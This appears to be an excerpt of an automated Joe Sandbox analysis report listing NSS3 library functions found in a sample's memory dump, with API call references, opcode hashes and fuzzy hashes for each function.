Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: _byteswap_ulong$_byteswap_ushortsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2358773949-598938438
Opcode ID: a5e482dbbb7023aab1d4fa67b4ad19f922dd7809e0c673b387290219a2fda829
Instruction ID: 06ba4cbe75ae9eee1f0e0c0d05ef29761ec212097bc838be75f4ba5a3a19cd62
Opcode Fuzzy Hash: a5e482dbbb7023aab1d4fa67b4ad19f922dd7809e0c673b387290219a2fda829
Instruction Fuzzy Hash: 6D51C4B1A08304EFDB01CF26D994A5ABBE0EF44318F448869F88987652F731D994CB97

Function 6C66AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C66ADB1

Part of subcall function 6C64BE30: SECOID_FindOID_Util.NSS3(6C60311B,00000000,?,6C60311B,?), ref: 6C64BE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C66ADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C66AE08

Part of subcall function 6C64B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7218D0,?), ref: 6C64B095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C66AE25
PL_FreeArenaPool.NSS3 ref: 6C66AE63
PR_CallOnce.NSS3(6C752AA4,6C6512D0), ref: 6C66AE4D

Part of subcall function 6C574C70: TlsGetValue.KERNEL32(?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574C97
Part of subcall function 6C574C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574CB0
Part of subcall function 6C574C70: PR_Unlock.NSS3(?,?,?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C66AE93
PR_CallOnce.NSS3(6C752AA4,6C6512D0), ref: 6C66AECC
PL_FreeArenaPool.NSS3 ref: 6C66AEDE
PL_FinishArenaPool.NSS3 ref: 6C66AEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C66AEF5
PL_FinishArenaPool.NSS3 ref: 6C66AF16

Strings

security, xrefs: 6C66ADEE

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: e79045140532dbf4f9523841b38e2eb1c409cda57e7235dccbc9ec237c4a2a28
Instruction ID: 4a9332975ab8310356433e6383db85e666bfaa211cf0252cede9e2d8f8393f95
Opcode Fuzzy Hash: e79045140532dbf4f9523841b38e2eb1c409cda57e7235dccbc9ec237c4a2a28
Instruction Fuzzy Hash: 93413AB5904320A7EB214A26DC44BBF32A8AF9331CF604525E81592F42FB35DA59C6DF

Function 6C70AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6B9890: TlsGetValue.KERNEL32(?,?,?,6C6B97EB), ref: 6C6B989E

EnterCriticalSection.KERNEL32(?), ref: 6C70AF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C70AFCE
PR_SetPollableEvent.NSS3(?), ref: 6C70AFD9
EnterCriticalSection.KERNEL32(?), ref: 6C70AFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C70B00F
_PR_MD_UNLOCK.NSS3(?), ref: 6C70B02F
_PR_MD_UNLOCK.NSS3(?), ref: 6C70B070
PR_JoinThread.NSS3(?), ref: 6C70B07B
free.MOZGLUE(?), ref: 6C70B084
EnterCriticalSection.KERNEL32(?), ref: 6C70B09B
_PR_MD_UNLOCK.NSS3(?), ref: 6C70B0C4
PR_JoinThread.NSS3(?), ref: 6C70B0F3
free.MOZGLUE(?), ref: 6C70B0FC
PR_JoinThread.NSS3(?), ref: 6C70B137
free.MOZGLUE(?), ref: 6C70B140

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 70f91b733b1084637ae85153123da2342ae9ddf1cbbc8f4b7b2bedf528eba787
Instruction ID: 8eac034bc4d5020b3b326dd8ab0706ae10a50cf6c20e6e7ffec5ffb3c18df7a8
Opcode Fuzzy Hash: 70f91b733b1084637ae85153123da2342ae9ddf1cbbc8f4b7b2bedf528eba787
Instruction Fuzzy Hash: 95915BB5A00601DFCB00DF14C98484ABBF1FF4A35C72985A9D8195BB22E732FD5ACB95

Function 6C608DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C608E22
EnterCriticalSection.KERNEL32(?), ref: 6C608E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C608E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C608E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C608E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C608EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C608EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C608EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C608F00
free.MOZGLUE(?), ref: 6C608F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C608F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C608F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C608F5B
PR_Unlock.NSS3(?), ref: 6C608F72
PR_Unlock.NSS3(?), ref: 6C608F82

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 6945bc2c361207076c4bff3a679c958d4cd99c36d715ad17046975bf9d38ccc5
Instruction ID: 08801a233c6d9fe5def1d488ffc89e66b0b113807e03d9da5b9f237acf70d5d4
Opcode Fuzzy Hash: 6945bc2c361207076c4bff3a679c958d4cd99c36d715ad17046975bf9d38ccc5
Instruction Fuzzy Hash: E65139B2F002159FDB04DF68CD889AAB7B9EF49358B14452AEC08AB710E731ED45C7D5

Function 6C62CE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6C62CE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C62CEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6C62CED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6C62CEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6C62CF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C62CF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6C62CF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6C62CF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6C62CF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6C62CFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6C62CFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6C62CFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6C62CFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6C62D007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6C62D021

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: ad6c4d7f6f27d48ada42364c7d96081cfc04fc43f224e9fd58374d58f57d64cc
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: 4C318871F5292027EF4D145A6C21FDE254A4F6730EF544038F90AE67C0FA899B1742ED

Function 6C700FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6C701000

Part of subcall function 6C6B9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C5E1A48), ref: 6C6B9BB3
Part of subcall function 6C6B9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C5E1A48), ref: 6C6B9BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C701016

Part of subcall function 6C69C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C69C2BF

PR_Unlock.NSS3(?), ref: 6C701021

Part of subcall function 6C69DD70: TlsGetValue.KERNEL32 ref: 6C69DD8C
Part of subcall function 6C69DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C69DDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C701046
PR_Unlock.NSS3(?), ref: 6C70106B
PR_Lock.NSS3 ref: 6C701079
PR_Unlock.NSS3 ref: 6C701096
free.MOZGLUE(?), ref: 6C7010A7
free.MOZGLUE(?), ref: 6C7010B4
PR_DestroyCondVar.NSS3(?), ref: 6C7010BF
PR_DestroyCondVar.NSS3(?), ref: 6C7010CA
PR_DestroyCondVar.NSS3(?), ref: 6C7010D5
PR_DestroyCondVar.NSS3(?), ref: 6C7010E0
PR_DestroyLock.NSS3(?), ref: 6C7010EB
free.MOZGLUE(?), ref: 6C701105

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: aefe57aa92784a2ed12abb2ecc17a0e9c84009c16d9992b1e8e16aee2c036633
Instruction ID: 17a21384eb884527c3e444da7282c04a2eea083164324b52168d5962b07532cb
Opcode Fuzzy Hash: aefe57aa92784a2ed12abb2ecc17a0e9c84009c16d9992b1e8e16aee2c036633
Instruction Fuzzy Hash: BC318AF5A00502ABDB02AF14EE41A45B7B1FF4231DB584135E80952FA1EB72F978DBC6

Function 6C63EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C63EE0B

Part of subcall function 6C650BE0: malloc.MOZGLUE(6C648D2D,?,00000000,?), ref: 6C650BF8
Part of subcall function 6C650BE0: TlsGetValue.KERNEL32(6C648D2D,?,00000000,?), ref: 6C650C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C63EEE1

Part of subcall function 6C631D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C631D7E
Part of subcall function 6C631D50: EnterCriticalSection.KERNEL32(?), ref: 6C631D8E
Part of subcall function 6C631D50: PR_Unlock.NSS3(?), ref: 6C631DD3

TlsGetValue.KERNEL32 ref: 6C63EE51
EnterCriticalSection.KERNEL32(?), ref: 6C63EE65
PR_Unlock.NSS3(?), ref: 6C63EEA2
free.MOZGLUE(?), ref: 6C63EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C63EED0
PR_Unlock.NSS3(?), ref: 6C63EF48
free.MOZGLUE(?), ref: 6C63EF68
PR_SetError.NSS3(00000000,00000000), ref: 6C63EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C63EFA4
free.MOZGLUE(?), ref: 6C63EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C63F055
free.MOZGLUE(?), ref: 6C63F060

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: e40220cc34d101dd5eb9bc4834fb8c72269a2053e072a063137613a451741349
Instruction ID: 159154f89b91d700dc85b8817f12d99cc1a7df973f08025403e8aae071bb1f40
Opcode Fuzzy Hash: e40220cc34d101dd5eb9bc4834fb8c72269a2053e072a063137613a451741349
Instruction Fuzzy Hash: EB81A1B1A00219ABDF00DF64DC80ADE7BB5BF49318F546028E90DA3751E731ED25CBA9

Function 6C604CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C604D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C604D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C604DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C604E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C604E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C604E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C604E85
DER_Encode_Util.NSS3(?,?,6C7505A4,00000000), ref: 6C604EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C604F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C604F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C604F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C604F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C604F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C604FC8

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: eb81b0962d56eda4017a4904fb2a359e5e62325e959b5de3fc5ba11d06859892
Instruction ID: 5e2537165e2b26bf0b931c05cd1d1c7dc392fed975412365b682687d6ba799c4
Opcode Fuzzy Hash: eb81b0962d56eda4017a4904fb2a359e5e62325e959b5de3fc5ba11d06859892
Instruction Fuzzy Hash: 5481F671A08301AFE715CF24D940BABB7E4AFD5308F14852DF958EB640E7B1E905CB9A

Function 6C600470 Relevance: 21.2, APIs: 14, Instructions: 206timeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C6004B7

Part of subcall function 6C650FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5F87ED,00000800,6C5EEF74,00000000), ref: 6C651000
Part of subcall function 6C650FF0: PR_NewLock.NSS3(?,00000800,6C5EEF74,00000000), ref: 6C651016
Part of subcall function 6C650FF0: PL_InitArenaPool.NSS3(00000000,security,6C5F87ED,00000008,?,00000800,6C5EEF74,00000000), ref: 6C65102B

PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C600539

Part of subcall function 6C651200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C5F88A4,00000000,00000000), ref: 6C651228
Part of subcall function 6C651200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C651238
Part of subcall function 6C651200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C5F88A4,00000000,00000000), ref: 6C65124B
Part of subcall function 6C651200: PR_CallOnce.NSS3(6C752AA4,6C6512D0,00000000,00000000,00000000,?,6C5F88A4,00000000,00000000), ref: 6C65125D
Part of subcall function 6C651200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C65126F
Part of subcall function 6C651200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C651280
Part of subcall function 6C651200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C65128E
Part of subcall function 6C651200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C65129A
Part of subcall function 6C651200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C6512A1

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C60054A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C60056D
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6005CA
DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C6005EA
PR_SetError.NSS3(FFFFE00C,00000000), ref: 6C6005FD
PR_SetError.NSS3(FFFFE07E,00000000), ref: 6C600621
PR_EnterMonitor.NSS3 ref: 6C60063E
PR_ExitMonitor.NSS3 ref: 6C600668
CERT_DestroyCertificate.NSS3(?), ref: 6C600697
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6006AC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6006CC
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6006DA

Part of subcall function 6C5FE6B0: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6C6004DC,?,?), ref: 6C5FE6C9
Part of subcall function 6C5FE6B0: PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6C6004DC,?,?), ref: 6C5FE6D9
Part of subcall function 6C5FE6B0: memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6C6004DC,?,?), ref: 6C5FE6F4
Part of subcall function 6C5FE6B0: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6C6004DC,?), ref: 6C5FE703
Part of subcall function 6C5FE6B0: CERT_FindCertIssuer.NSS3(?,?,6C6004DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C5FE71E

Part of subcall function 6C5FF660: PR_EnterMonitor.NSS3(6C60050F,?,00000001,?,?,?), ref: 6C5FF6A8
Part of subcall function 6C5FF660: PR_Now.NSS3(?,?,?,00000001,?,?,?), ref: 6C5FF6C1
Part of subcall function 6C5FF660: PR_ExitMonitor.NSS3(?,?,?,00000001,?,?,?), ref: 6C5FF7C8

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$ArenaArena_ErrorFree$Monitor$EnterPool$CriticalExitSectionfree$AlgorithmAlloc_CallCertCertificateClearDeleteDestroyFindGeneralizedInitIssuerLockMark_OnceTimeTime_UnlockValuecallocmemset
String ID:
API String ID: 2470852775-0
Opcode ID: dcbc54b5c1760756005c7e3c294cfd3a1581d6afdcb3e0e5663ed4a8004b4862
Instruction ID: 371acc83440f1165276bf725f561e9cc262b0a3a8f854072fb74279ef5bbc7f6
Opcode Fuzzy Hash: dcbc54b5c1760756005c7e3c294cfd3a1581d6afdcb3e0e5663ed4a8004b4862
Instruction Fuzzy Hash: 29611771B04341AFDB04CE14CE40B5B73E5AFC5358F104528F959A7791EB30E918CB9A

Function 6C638F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C639582), ref: 6C638F5B

Part of subcall function 6C64BE30: SECOID_FindOID_Util.NSS3(6C60311B,00000000,?,6C60311B,?), ref: 6C64BE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C638F6A

Part of subcall function 6C650FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5F87ED,00000800,6C5EEF74,00000000), ref: 6C651000
Part of subcall function 6C650FF0: PR_NewLock.NSS3(?,00000800,6C5EEF74,00000000), ref: 6C651016
Part of subcall function 6C650FF0: PL_InitArenaPool.NSS3(00000000,security,6C5F87ED,00000008,?,00000800,6C5EEF74,00000000), ref: 6C65102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C638FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6C638FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6C71D820,6C639576), ref: 6C638FF9
DER_GetInteger_Util.NSS3(?), ref: 6C63901D
PORT_ZAlloc_Util.NSS3(?), ref: 6C63903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C639062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C6390A2
PORT_ZAlloc_Util.NSS3(?), ref: 6C6390CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6C6390F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C63912D
free.MOZGLUE(00000000), ref: 6C639136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C639145

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: 095ba0dbefd21b99465115b2d0c5675991dc9c13ed435e20a08202019171be40
Instruction ID: abf22e6ce00bf39692f03c8da254004a8fe4e8cebd4185f6fd176d1534c2d605
Opcode Fuzzy Hash: 095ba0dbefd21b99465115b2d0c5675991dc9c13ed435e20a08202019171be40
Instruction Fuzzy Hash: 925103B2A042109BEB00CF28DC81B9BB7E4AF9535CF045529EC58D7711EB31E949CF9A

Function 6C62ADC0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C62ADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C62AE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C62AE29

Part of subcall function 6C70D930: PL_strncpyz.NSS3(?,?,?), ref: 6C70D963

PR_LogPrint.NSS3(?,00000000), ref: 6C62AE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C62AE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C62AE8A
PR_LogPrint.NSS3(?,00000000), ref: 6C62AEA0

Strings

C_MessageSignInit, xrefs: 6C62ADE1
hSession = 0x%x, xrefs: 6C62AE01, 6C62AE11
(CK_INVALID_HANDLE), xrefs: 6C62AE1F, 6C62AE80
npl, xrefs: 6C62AEB8, 6C62AEE6
hKey = 0x%x, xrefs: 6C62AE62, 6C62AE72

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

